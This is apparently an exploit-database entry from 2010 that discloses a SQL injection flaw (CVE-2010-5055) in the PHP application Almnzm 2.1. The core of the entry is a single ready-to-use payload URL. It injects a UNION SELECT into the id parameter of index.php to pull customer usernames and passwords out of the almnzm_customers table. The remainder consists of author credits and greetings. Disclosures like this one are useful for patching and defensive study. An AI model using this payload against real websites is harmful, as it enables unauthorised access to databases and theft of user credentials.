Almnzm 2.1 - SQL Injection

Author: NeX HaCkEr
type: webapps
platform: php
port: 
date_added: 2010-04-13 
date_updated:  
verified: 1 
codes: OSVDB-63843;CVE-2010-5055 
tags: 
aliases:  
screenshot_url:  
application_url: 

# Title: almnzm 2.1 <= SQL Injection Vulnerability
# Author: NeX HaCkEr
# Published: 2010-04-14
# Contact= error_log@hotmail.com
#Script site :http://www.almnzm.com




[::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::]
>> #1 Vulnerability
Type = SQL Injection
Example URL = index.php?a=pages&id=3' and 1=0 UnIon aLL Select 1,2,concat(username,0x3a,password),4,5,6,7 from almnzm_customers--%20


[::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::]




[::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::]
>> Greetz
= Dr.DaShEr, DaMI, dr.kasber, RmZ AlJnooP =
[::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::]